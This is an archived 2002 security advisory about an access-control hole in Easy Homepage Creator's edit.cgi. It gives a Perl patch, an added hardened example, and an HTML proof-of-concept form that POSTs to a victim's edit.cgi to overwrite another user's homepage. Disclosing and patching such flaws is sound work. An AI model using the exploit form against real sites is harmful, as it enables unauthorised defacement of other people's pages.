[UNIX] Easy Homepage Creator Vulnerability

From: support@securiteam.com
Date: 07/29/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 29 Jul 2002 07:49:31 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Easy Homepage Creator Vulnerability
------------------------------------------------------------------------

SUMMARY

The <http://www.easyscripts.co.uk/hc_index.htm> Easy Homepage Creator is a
Perl/CGI program that allows your website visitors to sign up for their
very own homepage on your website. A security vulnerability in the product
allows anyone to change another user's homepage without being required to
have any special security privileges.

DETAILS

Vulnerable systems:
 * Advanced Easy Homepage Creator version 1.0
 * Easy Homepage Creator version 1.0

Solution:
Add Access Validation to the "print_html_to_file" function.

Add to edit.cgi the following code:
  sub login_check
  {
     # Reject empty credentials before touching the profile store.
     if ($FORM{'username'} eq "" or $FORM{'password'} eq "")
     {
             dienice("Sorry, but you haven't entered a Username or "
                   . "Password. Please press the 'back' button on your "
                   . "browser to return to the login screen.");
     }
     # Username and password are compared in lower case.
     $FORM{'username'} =~ tr/A-Z/a-z/;
     $FORM{'password'} =~ tr/A-Z/a-z/;

     # The profile file name is built from the submitted username.
     open(PROFILE,"<$rootdir/profiles/$FORM{'username'}.pro") ||
             dienice("Sorry, but you have entered an invalid username or "
                   . "password. Please press the 'back' button on your "
                   . "browser to return to the login form.");
     @DATA = <PROFILE>;
     chomp(@DATA);
     # Index 1 of the profile holds the username, index 2 the password.
     if (!($FORM{'username'} eq $DATA[1] && $FORM{'password'} eq $DATA[2]))
     {
             dienice("Sorry, but you have entered an invalid username or "
                   . "password. Please press the 'back' button on your "
                   . "browser to return to the Login Form and try "
                   . "logging-in again.");
     }
     close(PROFILE);

     open(CHECK_USERNAME,"<$rootdir/profiles/ban_users.dat") ||
             dienice("Configuration Error! Unable to open ban_users.dat "
                   . "file for reading. Please contact the webmaster of "
                   . "this web site. The following error occured : $!");
     @check = <CHECK_USERNAME>;
     chomp(@check);
     close(CHECK_USERNAME);

     foreach $line (@check)
     {
       # \Q...\E stops characters in the username acting as regex syntax.
       if ($line =~ /\Q$FORM{'username'}\E/i)
       {
              dienice("Sorry, but you have been banned from using the "
                    . "Homepage Creator. You should have been sent an "
                    . "email explaining why you have been banned from "
                    . "using the Homepage Creator. For more details "
                    . "contact the webmaster of this web site.");
       }
     }
  }

  sub dienice
  {
     my($msg) = @_;
     # Print the error page and stop. In the script itself the closing
     # EndHTML terminator must start in the first column of its line.
     print <<EndHTML;
     <html>
     <head>
     <title>Homepage Login Error</title>
     </head>
     <body bgcolor="$bg_colour" link="$hyperlinks_colour" vlink="$hyperlinks_colour" alink="$hyperlinks_colour">
     <p align="center">$logo_url $banner_url</p>
     <hr color="$linebreakcolour">
     <p align="left"><b><font face="Times New Roman" color="$title_colour" size="5"> Homepage Login Error</font></b></p>
     <p align="left"><font face="Verdana" size="2" color="$field_text_colour"><b>$msg</b></font></p>
     <hr color="$linebreakcolour">
     <p align="center"><font size="1" face="Verdana" color="$field_text_colour"><b>&copy; Copyright
     <a href="http://www.easyscripts.co.uk">
     Easy Scripts Archive</a> 2001. All Rights Reserved.</b></font></p>
     </body>
     </html>
EndHTML
     exit;
  }

Then add this call as the first line of the "print_html_to_file" function:
&login_check;
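
A stricter form of the login check above, as an added example that is not part of the advisory or the vendor's code: the username is validated against an allowlist before it reaches the profile path, files are opened with three-argument open, and the ban list is matched by whole-line comparison instead of a regex. The username policy, the one-name-per-line ban_users.dat layout, the check_login name and the sample profiles are assumptions.

```perl
# Added example, not Easy Homepage Creator code. Assumed profile layout:
# index 1 = username, index 2 = password (as the advisory's check reads them).
use strict;
use warnings;
use File::Temp qw(tempdir);

# Returns 'ok', 'invalid' or 'banned' instead of printing an error page.
sub check_login {
    my ($rootdir, $user, $pass) = @_;
    return 'invalid' unless defined($user) && defined($pass) && length($pass);
    $user = lc $user;
    $pass = lc $pass;    # the advisory's check folds case on both fields

    # Assumed username policy: allowlist before the value reaches a path.
    return 'invalid' unless $user =~ /\A[a-z0-9_]{1,32}\z/;

    # Three-argument open: the file name cannot change the open mode.
    open(my $fh, '<', "$rootdir/profiles/$user.pro") or return 'invalid';
    chomp(my @data = <$fh>);
    close($fh);
    return 'invalid'
        unless defined($data[2]) && $data[1] eq $user && $data[2] eq $pass;

    # Ban list: whole-line comparison, no user input inside a regex.
    open(my $ban, '<', "$rootdir/profiles/ban_users.dat")
        or die "cannot read ban_users.dat: $!";
    chomp(my @banned = <$ban>);
    close($ban);
    return 'banned' if grep { lc($_) eq $user } @banned;
    return 'ok';
}

# Constructed sample data in a temporary directory.
my $root = tempdir(CLEANUP => 1);
mkdir "$root/profiles" or die $!;
my %files = (
    'alice.pro'     => "constructed\nalice\nsecret\n",
    'bob.pro'       => "constructed\nbob\nhunter\n",
    'ban_users.dat' => "bob\n",
);
for my $name (keys %files) {
    open(my $out, '>', "$root/profiles/$name") or die $!;
    print {$out} $files{$name};
    close($out);
}
for my $case (['alice', 'secret'], ['alice', 'wrong'], ['alice', ''],
              ['../profiles/alice', 'secret'], ['bob', 'hunter']) {
    printf "%-20s => %s\n", $case->[0], check_login($root, @$case);
}
```

In edit.cgi the return value would drive dienice, and the check still has to run before print_html_to_file writes anything.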

Exploit:
<!--
Easy Homepage Creator Vulnerability

Date : July 18, 2002
Severity : High (Possible to edit member homepage)
Systems Affected:
        Advanced Easy Homepage Creator v1.0
        Easy Homepage Creator v1.0

Vendor URL: http://www.easyscripts.co.uk
Vuln Type : It does not use Access Validation to edit homepage
Author : AresU
Greetz to : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, FreshFirst, Algorithm,
Mr.Padang
Adv.URL : http://bosen.net/advisories/aresu-adv.001.txt
This source code is for educational purpose ONLY
-->

<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
    <td class=top>
    <input class=button type="submit" value="Edit Homepage"
name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:ar3su@yahoo.com> Arek
Suroboyo.
